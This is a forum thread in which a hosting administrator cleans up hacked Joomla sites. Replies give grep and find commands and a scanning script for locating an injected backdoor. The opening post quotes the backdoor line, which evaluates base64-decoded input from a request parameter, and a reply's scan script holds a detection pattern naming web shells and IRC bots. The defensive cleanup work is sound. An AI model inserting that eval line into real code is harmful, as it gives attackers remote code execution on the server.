hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Find a php cod on all php files
Reply

Forum Jump

Find a php cod on all php files

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 03-09-2013, 03:44 AM
afradata afradata is offline
Newbie
 
Join Date: Feb 2013
Posts: 11

Find a php cod on all php files


Hi 2 All

I've received a few complaints from the xlhost Datacenter

Subject : TOS Violation - Malicious Activity


Abuse Team,
It appears that the below IP addresses that you seem to host have been used in recent cyber attacks. We have been informed these compromises are possibly the result of a Joomla or other CMS vulnerability and if not patched will simply be re-infected.
We request that you investigate these IP addresses to identify any malicious activity. If you are able to confirm suspicious activity, we ask that you take appropriate action to disable the malware, patch the vulnerability or remove the devices from the network. It is also likely Joomla administrative passwords where compromised and they should be changed to prevent re-infection.
All IPs/URLs have been confirmed as active just prior to this notification being sent. If you feel action has already been taken, please reconfirm by viewing the HTTP status with a tool like wget or cURL. If using cURL, use the following command:
curl -A “Mozilla/4.0” -iL
Please note the HTTP status in the first line of output, if the first line of output is 'HTTP/1.1 200 OK', that means the file exists, despite any other output in consequent lines.
Thank you for your immediate attention and action. Please contact us as soon as you receive this and stay in contact until any issues have been resolved. Additional technical details are provided below.
Regards,
Abuse Team
Bank of America

*********************************************************************************************************************************
Examples of Malicious Content
*********************************************************************************************************************************
Malicious content:
xxx.xxx.xxx.xxx /plugins/system/dvmessages.php,

This site is joomla 1.5

I've checked the dvmessages.php file

file Was attached haced file.php file

I examined a normal dvmessages.php file

file Was attached normal file.php file

Differences between two files by hacking the code below
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));

i want search this code defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); all users php file to /home folder

please help me

Thanks All
Attached Files
File Type: zip dvmessages.zip (2.2 KB, 49 views)



Sponsored Links
  #2  
Old 03-09-2013, 05:05 AM
@ntvlinux @ntvlinux is offline
Newbie
 
Join Date: Jun 2011
Location: India
Posts: 15
Hello Friend,

To find a specific content in different files in a directory, you can use the below command. This command will give a list of files that contains "JEXEC" along with the path to the files.

grep -irl JEXEC /home

You can replace the search content with JEXEC and search.

You can also search like "defined( '_JEXEC' )" ie within "" if its contains spaces.

Please try.

  #3  
Old 03-09-2013, 08:37 AM
pasargad pasargad is offline
Newbie
 
Join Date: Jul 2009
Posts: 12
Hello
I want know XLHost how can find it? please contact and question with theme.
May be theme have finder for this files.
Thank you

Sponsored Links
  #4  
Old 03-09-2013, 09:42 AM
madaboutlinux madaboutlinux is offline
Web Hosting Master
 
Join Date: Jul 2009
Posts: 1,543
To search all the files of all accounts on the server, use the below command:

Quote:
for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -l "eval(base64_decode($_REQUEST" /home/$i/public_html/* -R; done;

__________________
| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

  #5  
Old 03-21-2013, 02:02 PM
afradata afradata is offline
Newbie
 
Join Date: Feb 2013
Posts: 11
Quote:
Originally Posted by madaboutlinux View Post
To search all the files of all accounts on the server, use the below command:
Thank you madaboutlinux
This code work at cpanel
i want search to directadmin panel

best regurds

  #6  
Old 03-21-2013, 02:18 PM
kevincheri kevincheri is offline
Web Hosting Master
 
Join Date: May 2012
Location: India
Posts: 673
try this,
find /home/ -type f -name \*.php -exec grep -il "eval(base64_decode($_REQUEST" {} \;

__________________
Kevin Cheri : Freelance Linux Admin 6+ Exp, reach me out for any help
Skype : lynxmaestro
Gmail : cheri.kevin@gmail.com

  #7  
Old 03-21-2013, 05:05 PM
gnulinuxexpert gnulinuxexpert is offline
WHT Addict
 
Join Date: Aug 2010
Location: /bin/bash
Posts: 123
You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

Quote:
#!/bin/bash
pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
searchpath=/home/*
find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
cat report.$$
Cheers!!!

__________________
When all else fails ... Read the documentation!!!



  #8  
Old 03-22-2013, 02:30 AM
pasargad pasargad is offline
Newbie
 
Join Date: Jul 2009
Posts: 12
Quote:
Originally Posted by gnulinuxexpert View Post
You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

Quote:
#!/bin/bash
pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
searchpath=/home/*
find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
cat report.$$
Cheers!!!
Hello

Where can use this?
copy in .sh file and run it?
Receive mail from my data center about this problem.

Quote:
Dear Sir or Madam,

We have received spam/abuse notification. Please take the necessary
steps to prevent this from happening again in future.

Furthermore, we would request that you provide both ourselves and the
person who has submitted this complaint with a short statement within
24 hours. This statement should include details of the events leading
up to the incident and the steps you are taking to deal with it.

Next steps:
- Solve the problem
- Send your statement to us: Please use the following link for this: http://abuse.hetzner.de/ [link repley to abuse]
- Send your statement to the person making the complaint per email

The details will then be checked by a colleague, who will coordinate
further proceedings. In the event of several complaints, this may
lead to the server being locked.

Important information:
When replying to us, please leave the Abuse ID [AbuseID:000000] in
the subject line unchanged.


Kind regards,

Sandra Betz

Hetzner Online AG
Stuttgarter Straße 1
91710 Gunzenhausen
Tel: + 49 (0)9831 610061
Fax: + 49 (0)9831 61006-2
abuse@hetzner.de
www.hetzner.com

Register Court: Registergericht Ansbach, HRB 3204
Management Board: Dipl. Ing. (FH) Martin Hetzner
Chairwoman of the Supervisory Board: Diana Rothhan

----- attachment -----

Dear Hetzner Abuse Team,

We have been informed of web servers in Germany which were apparently
compromised and are participating in DDoS attacks. Below is the list of
servers that are in your network area. The URL points to scripts that
have apparently been uploaded onto the servers by the attacker.

----- log file -----

IP: my server ip

Script(s):

http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php
Thank you

  #9  
Old 03-22-2013, 02:29 PM
gnulinuxexpert gnulinuxexpert is offline
WHT Addict
 
Join Date: Aug 2010
Location: /bin/bash
Posts: 123
Hi,

First of all you should disable the following files. Or your DC will suspend your server.

http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php

This dvmessages.php seems to be infected and its a part of Joomla plugin. Check the access log for the ip's that accessed the php file and block it. Would be better to suspend the account and reactivate only after updating the Joomla/plugin. Update DC that you have disabled the files, blocked ip's and disabled the website and will enable it only after updating the outdated plugins.

You may check similar files like dvmessages.php using the following command.

Quote:
updatedb
Quote:
locate dvmessages.php
Check the output and review the files to see if any is infected.

If you are not sure about this, I would recommend you to hire an administrator who know about this.

For executing the script, just create a file named scan.sh and copy paste the script contents.

Save it.

Provide execute permission using the following.

Quote:
chmod +x scan.sh
Run it using

Quote:
./scan.sh
Make sure to add the particular pattern you found in dvmessages.php so the script will scan that pattern as well.

Cheers!!!

__________________
When all else fails ... Read the documentation!!!



  #10  
Old 03-23-2013, 10:20 AM
mixmox mixmox is offline
I Like Beer!
 
Join Date: Sep 2008
Location: Sweden
Posts: 1,163
Quote:
Originally Posted by gnulinuxexpert View Post
You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.



Cheers!!!
c99 files codded by base 64 or ioncube
none of new c99 shell file are release with main open code

  #11  
Old 03-26-2013, 01:39 AM
afradata afradata is offline
Newbie
 
Join Date: Feb 2013
Posts: 11
Quote:
Originally Posted by gnulinuxexpert View Post
You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.



Cheers!!!
Hi

how can create a .sh for search whit code

for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -l "eval(base64_decode($_REQUEST" /home/$i/public_html/* -R; done;

and save All results and move finde file to another directory sampel path /home/Quarantine

when find .sh file search and file and move to another folder and report scan results

Thank you

Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
Nginx + Centos 5.4 Not displaying PHP - Just downloads PHP files CustomNetwork VPS Hosting 9 02-10-2013 02:58 AM
Looking for a web host that support .cod and .jad files! ElFlammable Web Hosting 10 11-21-2011 08:17 AM
PHP script to convert Video files to Flash files DelPierro Programming Discussion 12 02-02-2011 03:22 AM
when php fails dont send php files - apache config nand Hosting Security and Technology 2 09-24-2005 04:02 PM
php & txt files, how can I edit txt files using php? dpny Programming Discussion 13 12-27-2003 08:08 PM

Related posts from TheWhir.com
Title Type Date Posted
Nexcess Uncovers Magento Exploit That Allows Hackers to Skim Credit Card Data During Checkout Web Hosting News 2014-07-30 14:10:13
The Pirate Bay Uploads Continue to Grow Despite Anti-Piracy Pressure Web Hosting News 2013-12-31 11:33:12
Egnyte Synchronizes Google Drive with Private Cloud Storage Web Hosting News 2013-07-17 12:36:21
Malwarebytes Launches Data Scan-and-Backup Service Web Hosting News 2013-05-07 14:51:03
Yahoo Integrates Email Client with Dropbox Cloud Storage Web Hosting News 2013-04-04 14:31:40


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?